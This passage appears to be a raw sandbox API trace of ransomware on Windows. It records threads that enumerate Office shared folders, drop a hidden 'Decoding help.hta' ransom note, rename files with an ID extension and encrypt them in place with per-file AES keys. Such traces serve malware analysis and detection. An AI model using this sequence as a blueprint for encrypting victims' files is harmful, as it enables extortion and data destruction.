CreateFileMappingA (hFile=0x77c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x778 [0056.461] CryptAcquireContextA (in: phProv=0x778fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x778fcec*=0x3448f18) returned 1 [0059.956] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0x778fce8 | out: phKey=0x778fce8*=0x5da378) returned 1 [0059.956] CryptExportKey (in: hKey=0x5da378, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x778fbe4, pdwDataLen=0x778fce4 | out: pbData=0x778fbe4*, pdwDataLen=0x778fce4*=0x2c) returned 1 [0059.956] MapViewOfFile (hFileMappingObject=0x778, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf2b80) returned 0x129a0000 [0059.967] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x778fbe4*, pdwDataLen=0x778fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x778fbe4*, pdwDataLen=0x778fcf8*=0x100) returned 1 [0059.967] CryptEncrypt (in: hKey=0x5da378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x129a0000, pdwDataLen=0x778fce4*=0xf2b80, dwBufLen=0xf2b80 | out: pbData=0x129a0000*, pdwDataLen=0x778fce4*=0xf2b80) returned 1 [0060.865] UnmapViewOfFile (lpBaseAddress=0x129a0000) returned 1 [0064.137] CloseHandle (hObject=0x778) returned 1 [0064.138] CryptDestroyKey (hKey=0x5da378) returned 1 [0064.138] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0064.138] SetFilePointerEx (in: hFile=0x77c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.138] WriteFile (hFile=0x77c, lpBuffer=0x778fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0) Thread: id = 282 os_tid = 0x4e0 [0042.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*", lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db478 [0042.316] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.316] FindNextFileW (in: hFindFile=0x5db478, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.316] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.316] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.316] FindNextFileW (in: hFindFile=0x5db478, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0042.316] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0042.316] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0042.316] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0042.316] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" [0042.317] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned 63 [0042.317] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033" [0042.317] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*" [0042.317] GlobalMemoryStatus (in: lpBuffer=0xa64fd10 | out: lpBuffer=0xa64fd10) [0042.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c602b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5b8 [0042.319] CloseHandle (hObject=0x5b8) returned 1 [0042.319] FindNextFileW (in: hFindFile=0x5db478, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0042.319] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" [0042.319] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned 63 [0042.319] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta" [0042.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\decoding help.hta")) returned 0xffffffff [0042.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e0 [0042.364] WriteFile (in: hFile=0x5e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa64fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa64fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.365] CloseHandle (hObject=0x5e0) returned 1 [0042.365] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.365] lstrcmpiW (lpString1="Decoding help.hta", lpString2="EQNEDT32.CNT") returned -1 [0042.365] lstrlenW (lpString="EQNEDT32.CNT") returned 12 [0042.365] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" [0042.365] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned 63 [0042.365] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpString2="EQNEDT32.CNT" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" [0042.365] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" [0042.365] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.[ID]g9uZrLhJaygpwRm1[ID]" [0042.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.390] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0042.390] CreateFileMappingA (hFile=0x5f8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5fc [0042.390] CryptAcquireContextA (in: phProv=0xa64fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa64fcec*=0x3448a50) returned 1 [0042.391] CryptGenKey (in: hProv=0x3448a50, Algid=0x6610, dwFlags=0x1, phKey=0xa64fce8 | out: phKey=0xa64fce8*=0x5db878) returned 1 [0042.391] CryptExportKey (in: hKey=0x5db878, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa64fbe4, pdwDataLen=0xa64fce4 | out: pbData=0xa64fbe4*, pdwDataLen=0xa64fce4*=0x2c) returned 1 [0042.391] MapViewOfFile (hFileMappingObject=0x5fc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9e0) returned 0x2d0000 [0045.651] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa64fbe4*, pdwDataLen=0xa64fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa64fbe4*, pdwDataLen=0xa64fcf8*=0x100) returned 1 [0048.843] CryptEncrypt (in: hKey=0x5db878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xa64fce4*=0x9e0, dwBufLen=0x9e0 | out: pbData=0x2d0000*, pdwDataLen=0xa64fce4*=0x9e0) returned 1 [0048.843] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0048.844] CloseHandle (hObject=0x5fc) returned 1 [0048.844] CryptDestroyKey (hKey=0x5db878) returned 1 [0048.844] CryptReleaseContext (hProv=0x3448a50, dwFlags=0x0) returned 1 [0048.844] SetFilePointerEx (in: hFile=0x5f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.845] WriteFile (in: hFile=0x5f8, lpBuffer=0xa64fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xa64fcf8, lpOverlapped=0x0 | out: lpBuffer=0xa64fbe4*, lpNumberOfBytesWritten=0xa64fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.883] WriteFile (in: hFile=0x5f8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa64fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xa64fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.883] CloseHandle (hObject=0x5f8) returned 1 [0050.884] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.885] FindNextFileW (in: hFindFile=0x5db478, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0050.885] lstrcpyW (in: lpString1=0x25398268, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" [0050.885] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned 63 [0050.885] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta" [0050.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\decoding help.hta")) returned 0x1 [0050.885] lstrcmpiW (lpString1="Decoding help.hta", lpString2="EQNEDT32.EXE") returned -1 [0050.885] lstrlenW (lpString="EQNEDT32.EXE") returned 12 [0050.885] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" [0050.885] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned 63 [0050.885] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpString2="EQNEDT32.EXE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" [0050.885] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" [0050.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.[ID]g9uZrLhJaygpwRm1[ID]" [0050.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0050.886] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0050.887] CreateFileMappingA (hFile=0x5f8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0050.887] CryptAcquireContextA (in: phProv=0xa64fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa64fcec*=0x3449820) returned 1 [0054.593] CryptGenKey (in: hProv=0x3449820, Algid=0x6610, dwFlags=0x1, phKey=0xa64fce8 | out: phKey=0xa64fce8*=0x671270) returned 1 [0054.593] CryptExportKey (in: hKey=0x671270, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa64fbe4, pdwDataLen=0xa64fce4 | out: pbData=0xa64fbe4*, pdwDataLen=0xa64fce4*=0x2c) returned 1 [0054.593] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x84a40) returned 0x118a0000 [0054.598] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa64fbe4*, pdwDataLen=0xa64fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa64fbe4*, pdwDataLen=0xa64fcf8*=0x100) returned 1 [0054.598] CryptEncrypt (in: hKey=0x671270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x118a0000, pdwDataLen=0xa64fce4*=0x84a40, dwBufLen=0x84a40 | out: pbData=0x118a0000*, pdwDataLen=0xa64fce4*=0x84a40) returned 1 [0054.655] UnmapViewOfFile (lpBaseAddress=0x118a0000) returned 1 [0054.662] CloseHandle (hObject=0x66c) returned 1 [0054.662] CryptDestroyKey (hKey=0x671270) returned 1 [0054.662] CryptReleaseContext (hProv=0x3449820, dwFlags=0x0) returned 1 [0054.662] SetFilePointerEx (in: hFile=0x5f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.662] WriteFile (in: hFile=0x5f8, lpBuffer=0xa64fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xa64fcf8, lpOverlapped=0x0 | out: lpBuffer=0xa64fbe4*, lpNumberOfBytesWritten=0xa64fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.934] WriteFile (in: hFile=0x5f8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa64fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xa64fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.934] CloseHandle (hObject=0x5f8) returned 1 [0056.935] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.457] FindNextFileW (in: hFindFile=0x5db478, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 1 [0058.457] lstrcpyW (in: lpString1=0x2a820628, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" [0058.457] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned 63 [0058.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta" [0058.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\decoding help.hta")) returned 0x1 [0058.457] lstrcmpiW (lpString1="Decoding help.hta", lpString2="eqnedt32.exe.manifest") returned -1 [0058.457] lstrlenW (lpString="eqnedt32.exe.manifest") returned 21 [0058.457] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" [0058.457] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned 63 [0058.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", lpString2="eqnedt32.exe.manifest" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" [0058.457] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" [0058.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.[ID]g9uZrLhJaygpwRm1[ID]" [0058.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x874 [0061.612] CreateFileMappingA (hFile=0x874, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x824 [0061.612] CryptAcquireContextA (phProv=0xa64fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 283 os_tid = 0x500 [0042.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*", lpFindFileData=0x13cdfd30 | out: lpFindFileData=0x13cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db7f8 [0042.386] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.386] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x13cdfd30 | out: lpFindFileData=0x13cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.386] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.386] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.386] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x13cdfd30 | out: lpFindFileData=0x13cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0042.386] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 